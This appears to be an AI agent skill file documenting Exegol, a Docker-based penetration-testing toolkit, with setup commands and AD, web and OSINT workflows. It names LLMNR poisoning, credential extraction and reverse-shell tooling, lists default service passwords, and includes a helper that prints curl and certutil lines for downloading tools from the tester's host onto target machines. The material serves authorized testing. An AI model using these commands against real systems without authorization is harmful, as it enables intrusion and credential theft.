---
name: exegol-pentest
description: Use when setting up or managing pentest environments with Exegol, launching offensive security containers, configuring VPN/network for engagements, or when the user mentions Exegol, pentest lab, HTB, CTF environment setup
---

# Exegol for Offensive Security

## Overview

Exegol is a Docker-based pentest environment with 100+ pre-installed offensive tools, managed via a Python CLI wrapper. It replaces traditional Kali VMs with fast, reproducible, disposable containers.

**Core concept:** `exegol start <name> <image>` creates a ready-to-hack container in seconds. All tools, resources, and configurations are pre-loaded.

For the complete CLI reference, images list, and resource catalog, see `exegol-reference.md` in this skill directory.

## When to Use

- User needs to set up a pentest/red team environment
- User wants to launch tools shipped in Exegol (BloodHound, Burp, Responder, NetExec / its unmaintained predecessor CrackMapExec, etc.)
- User is doing HTB, CTF, or lab work and needs a quick environment
- User asks about container-based offensive security setups
- User needs to manage multiple engagement environments simultaneously

**When NOT to use:** For defensive/blue team tooling, forensics-only workflows, or general Docker questions unrelated to security testing.

## Quick Reference

| Task | Command |
|------|---------|
| Start interactive container | `exegol start mypentest full` |
| Start with workspace | `exegol start client1 full -w ./engagement/` |
| Start with current dir | `exegol start client1 full -cwd` |
| Start with VPN | `exegol start htb full --vpn ~/vpn/lab.ovpn` |
| Start with logging | `exegol start client1 full -l -w ./engagement/` |
| Run single command | `exegol exec mypentest 'nmap -sV 10.10.10.1'` |
| Run GUI tool in background | `exegol exec -b mypentest burpsuite` |
| Temp container for one-off | `exegol exec --tmp full 'whatweb http://target'` |
| List containers/images | `exegol info` |
| Stop container | `exegol stop mypentest` |
| Remove container | `exegol remove mypentest` |
| Install an image | `exegol install full` |
| Update everything | `exegol update` |

## Engagement Setup Workflow

### 1. Choose the Right Image

| Image | Use Case |
|-------|----------|
| `full` | General pentest, full toolkit (50GB+) |
| `ad` | Active Directory / internal pentest |
| `web` | Web application testing |
| `light` | Quick recon, limited disk space |
| `osint` | OSINT / reconnaissance only |
| `free` | Same as `full` but community edition (delayed releases) |

### 2. Create the Engagement Container

```bash
# Standard engagement setup with workspace and logging
exegol start <engagement-name> <image> -w /path/to/engagement/ -l

# Example: Internal AD pentest
exegol start acme-internal ad -w ./acme-corp/ -l

# Example: Web app pentest
exegol start webapp-audit web -w ./webapp-audit/ -l

# Example: HTB lab with VPN
exegol start htb full --vpn ~/vpn/htb-lab.ovpn -w ./htb/
```

### 3. Network Configuration

| Scenario | Config |
|----------|--------|
| Host network (default) | No flag needed; the container shares the host's interfaces, so anything listening inside it is reachable from every network the host is on |
| VPN to target network | `--vpn ~/path/to/config.ovpn` (the tunnel is brought up inside the container) |
| VPN with credentials | `--vpn config.ovpn --vpn-auth creds.txt` |
| Isolated container | `--network disable` |
| Container-to-container | `--network docker` |
| Port forwarding | `-p 8080:8080 -p 4444:4444` (only meaningful outside host mode: Docker ignores port publishing when the container already uses the host's network stack) |

### 4. Privilege Options for Specific Attacks

```bash
# WiFi / network sniffing: raw sockets and interface changes need NET_ADMIN,
# and the USB adapter is passed through as a device
exegol start wifi full --cap NET_ADMIN -d /dev/bus/usb/

# USB device access (Proxmark, Rubber Ducky, etc.)
exegol start hw full -d /dev/ttyACM0

# Full privilege: effectively root on the host, so only when no specific
# capability or device passthrough covers the need
exegol start lab full --privileged
```
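The four steps above combined into one bootstrap helper. This is an added example written for this skill, not part of Exegol: it only assembles the `exegol start` command line from the flags documented above and prints it for review instead of running it, so it can be checked without Docker (append `| sh` once it looks right). The workspace layout (`recon/`, `loot/`, `www/`, `notes/`) is this script's own convention, the image list is the one from the table in step 1, and it deliberately refuses `--privileged` in favour of `--cap` / `-d`.

```shell
#!/bin/sh
# Added example (not Exegol code): bootstrap a per-engagement workspace and
# assemble the matching `exegol start` command from the flags documented above.
set -eu

# engagement_init ROOT: create the directory that -w mounts at /workspace.
# The sub-directory names are this script's convention, not Exegol's.
engagement_init() {
  root="$1"
  for sub in recon loot www notes; do
    mkdir -p "$root/$sub"
  done
  echo "$root"
}

# engagement_cmd NAME IMAGE WORKSPACE [VPN_CONFIG] [EXTRA_FLAG...]
# Prints the command on stdout instead of executing it, so it can be reviewed
# before anything touches Docker.
engagement_cmd() {
  name="$1"; image="$2"; ws="$3"; vpn="${4:-}"
  if [ $# -ge 4 ]; then shift 4; else shift $#; fi

  # Container names show up in `exegol info` and in log paths: keep them plain.
  case "$name" in
    ""|*[!a-zA-Z0-9_-]*) echo "invalid container name: '$name'" >&2; return 1 ;;
  esac
  # Images listed in this skill; anything else is most likely a typo.
  case "$image" in
    full|ad|web|light|osint|free) ;;
    *) echo "unknown image: $image" >&2; return 1 ;;
  esac

  # Workspace and shell logging are always on for a real engagement.
  cmd="exegol start $name $image -w $ws -l"

  if [ -n "$vpn" ]; then
    # An unreadable .ovpn would otherwise only fail after the container exists.
    if [ ! -r "$vpn" ]; then echo "VPN config not readable: $vpn" >&2; return 1; fi
    cmd="$cmd --vpn $vpn"
  fi

  for extra in "$@"; do
    # --privileged is root on the host; require a specific --cap or -d instead.
    if [ "$extra" = "--privileged" ]; then
      echo "refusing --privileged; use --cap <CAP> or -d <device>" >&2
      return 1
    fi
    cmd="$cmd $extra"
  done
  echo "$cmd"
}

# Usage (paths are placeholders; prints the command, append `| sh` to run it):
#   engagement_init ./acme-corp >/dev/null
#   engagement_cmd acme-internal ad ./acme-corp/ ./client-vpn.ovpn --cap NET_ADMIN
```

Because the command is printed rather than executed, the same helper doubles as a record of exactly which options each engagement container was created with, which matters since options cannot be changed after creation.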

## Pentest Workflow Patterns

### AD / Internal Pentest

```bash
# Create container with AD image
exegol start internal ad -w ./client-engagement/ -l --vpn client-vpn.ovpn

# Inside container:
neo4j start                              # Start Neo4j for BloodHound
bloodhound-ce                            # Launch BloodHound CE (web UI on port 1030)
nxc smb 10.0.0.0/24                      # Network discovery with NetExec (the maintained fork; `crackmapexec` is unmaintained)
responder -I eth0                        # LLMNR/NBT-NS poisoning: needs a broadcast segment you are on (eth0 in docker network mode, the physical NIC in host mode); it does not work across a routed VPN tunnel
bloodhound-python -d domain.local -u user -p pass -dc dc01.domain.local -ns 10.0.0.1 -c All  # Collect AD data; -dc/-ns point at the DC when your resolver is not the target's DNS
```

**Default credentials inside the container** (documented defaults, known to anyone who has read the Exegol docs; in host network mode a service bound to `0.0.0.0` inside the container is reachable from the host's networks with these credentials, so check what is listening before you start them on a client network):

| Service | User | Password |
|---------|------|----------|
| Neo4j | `neo4j` | `exegol4thewin` |
| BloodHound CE | via web UI | `exegol4thewin` |
| Empire | `empireadmin` | `exegol4thewin` |

### Web Application Pentest

```bash
# Create container with web image
exegol start webapp web -w ./webapp-audit/ -l

# Inside container:
burpsuite                                # Launch Burp Suite (proxy on 8080)
nuclei -u https://target.com             # Automated vuln scanning
sqlmap -u "http://target/page?id=1"      # SQL injection testing
ffuf -u http://target/FUZZ -w /opt/resources/...  # Directory fuzzing
```

### Recon / OSINT

```bash
exegol start recon osint -w ./recon/

# Inside container:
subfinder -d target.com                  # Subdomain enumeration
httpx -l subdomains.txt                  # HTTP probing
theHarvester -d target.com -b all        # Email/domain harvesting
```

### Privilege Escalation (Using Built-in Resources)

Resources are available at `/opt/resources` inside every container:

| Resource | Path | Purpose |
|----------|------|---------|
| LinPEAS | `/opt/resources/linux/linPEAS/` | Linux privesc enumeration |
| WinPEAS | `/opt/resources/windows/winPEAS/` | Windows privesc enumeration |
| Mimikatz | `/opt/resources/windows/mimikatz/` | Windows credential extraction |
| Chisel | `/opt/resources/linux/chisel/` | TCP/UDP tunneling |
| ligolo-ng | `/opt/resources/linux/ligolo-ng/` | Network pivoting |
| SharpHound | `/opt/resources/windows/SharpHound/` | AD collection |
| PrintSpoofer | `/opt/resources/windows/PrintSpoofer/` | Windows privesc |
| GodPotato | `/opt/resources/windows/GodPotato/` | Windows privesc |
| netcat (static) | `/opt/resources/linux/nc` | Reverse shells |

```bash
# Serve resources to target via HTTP. This serves the whole tree: anyone who can
# reach the port (everyone on the segment in host network mode) gets every tool
cd /opt/resources && python3 -m http.server 8888

# Or serve only the directory you need (-d requires Python 3.7+)
python3 -m http.server -d /opt/resources/linux/linPEAS/ 8888
```
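An added helper that takes the second approach further (this skill's own example, not part of Exegol): stage just the files an engagement needs into a per-engagement `www/` directory, keep a SHA-256 manifest of what was offered to targets, and print the download-and-verify one-liners for Linux and Windows targets. It assumes Exegol's `/opt/resources` root (overridable through `RES`), that the target can reach the given address and port, and that the target has `curl` or `certutil`; the file names in the usage comment are assumptions to check with `ls` against the actual resource directories.

```shell
#!/bin/sh
# Added example (not Exegol code): stage selected resources for one engagement,
# keep a SHA-256 manifest of what was offered to targets, and print the
# target-side commands that fetch and verify each file.
set -eu

# Exegol's resource root. Overridable so the helper can be exercised elsewhere.
RES="${RES:-/opt/resources}"

# stage_tool REL_PATH WWW_DIR: copy $RES/REL_PATH into WWW_DIR and append its
# hash to WWW_DIR/MANIFEST.sha256. Prints the staged file name.
stage_tool() {
  src="$RES/$1"; www="$2"
  if [ ! -f "$src" ]; then echo "not a file: $src" >&2; return 1; fi
  mkdir -p "$www"
  name=$(basename "$src")
  cp "$src" "$www/$name"
  sum=$(sha256sum "$www/$name" | cut -d' ' -f1)
  # Two spaces between hash and name is the format `sha256sum -c` expects.
  printf '%s  %s\n' "$sum" "$name" >> "$www/MANIFEST.sha256"
  echo "$name"
}

# verify_www WWW_DIR: confirm nothing in the drop directory changed since
# staging (worth re-running before the report is written).
verify_www() {
  (cd "$1" && sha256sum -c MANIFEST.sha256 >/dev/null)
}

# fetch_cmds LHOST PORT WWW_DIR: one Linux and one Windows download line per
# staged file, each re-checking the hash recorded at staging time.
fetch_cmds() {
  lhost="$1"; port="$2"; www="$3"
  while read -r sum name; do
    url="http://$lhost:$port/$name"
    echo "# $name"
    echo "curl -so /tmp/$name $url && echo '$sum  /tmp/$name' | sha256sum -c -"
    # certutil prints the hash; compare it against $sum by eye.
    echo "certutil -urlcache -split -f $url %TEMP%\\$name && certutil -hashfile %TEMP%\\$name SHA256"
  done < "$www/MANIFEST.sha256"
}

# serve_www WWW_DIR PORT: serve only the staged directory (-d needs Python 3.7+).
serve_www() {
  python3 -m http.server -d "$1" "$2"
}

# Usage inside the container (file names and the 10.10.14.2 address are placeholders):
#   stage_tool linux/linPEAS/linpeas.sh /workspace/www
#   stage_tool windows/winPEAS/winPEASx64.exe /workspace/www
#   fetch_cmds 10.10.14.2 8888 /workspace/www
#   serve_www /workspace/www 8888
```

Keeping `www/` under the `-w` workspace means the manifest survives `exegol remove` alongside the shell logs, so the report can state exactly which binaries, by hash, were placed on which host.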

## Multi-Container Engagements

Run parallel containers for different phases or targets:

```bash
# Recon container
exegol start recon-phase osint -w ./engagement/recon/

# Attack container with VPN
exegol start attack full --vpn client.ovpn -w ./engagement/attack/ -l

# C2 container
exegol start c2 full -p 443:443 -p 80:80 -w ./engagement/c2/ -l
```

Switch between containers by spawning new shells:

```bash
exegol start attack      # Opens new shell in existing "attack" container
```

## Credential Management (exegol-history)

```bash
# Add credentials found during engagement
exh add creds -u 'admin' -p 'P@ssw0rd!' -d 'ACME.LOCAL'
exh add creds -u 'svc_sql' -H 'aad3b435b51404eeaad3b435b51404ee:...' -d 'ACME.LOCAL'

# Set active credentials as environment variables
exh set creds

# Add discovered hosts
exh add hosts --ip 10.10.10.1 -n dc01 -r "Domain Controller"
exh add hosts --ip 10.10.10.5 -n web01 -r "IIS Web Server"

# View current context
exh show

# Bulk import
exh import creds --file found_creds.csv --format CSV
```

## Logging & Evidence

```bash
# Enable logging at container creation
exegol start engagement full -l -w ./engagement/

# Logs are written to /workspace/logs/ inside the container, which is the -w
# directory on the host, so they outlive `exegol remove` (asciinema format by default).
# Replay a session (file name illustrative; list the directory for the real names):
asciinema play /workspace/logs/session.cast
```

**Logging methods** (chosen with `--log-method` at creation; like every other option it cannot be changed afterwards):
- `asciinema` (default) — records terminal sessions with timing, replayable
- `script` — raw terminal recording via `script(1)`, plain text that is easy to grep

## Customization (my-resources)

Personal configs persist across all containers via `~/.exegol/my-resources/`:

| Path | Purpose |
|------|---------|
| `bin/` | Custom tools (auto-added to `$PATH`) |
| `setup/zsh/aliases` | Custom shell aliases |
| `setup/zsh/history` | Custom command history |
| `setup/python3/requirements.txt` | Python packages to auto-install |
| `setup/apt/packages.list` | APT packages to auto-install |
| `setup/bloodhound/customqueries_merge/` | BloodHound custom queries |
| `setup/firefox/policies.json` | Firefox extensions, bookmarks |
| `setup/load_user_setup.sh` | Custom setup script (runs on first start) |

## Common Mistakes

| Mistake | Fix |
|---------|-----|
| Trying to modify container config after creation | Container options are set at creation only. Remove and recreate. |
| Forgetting `-l` for logging | Always use `-l` on real engagements for evidence |
| Using `--privileged` everywhere | Use specific `--cap` flags instead (e.g., `--cap NET_ADMIN`) |
| Not setting workspace | Always use `-w` to persist data outside the container |
| Running out of disk space | `full` image is 50GB+. Use `light` or `ad`/`web` for focused work |
| VPN not working | VPN auto-switches to `docker` network mode. Check with `exegol info <container>` |
| GUI apps not displaying | Ensure X11 is not disabled. On macOS, install XQuartz. |
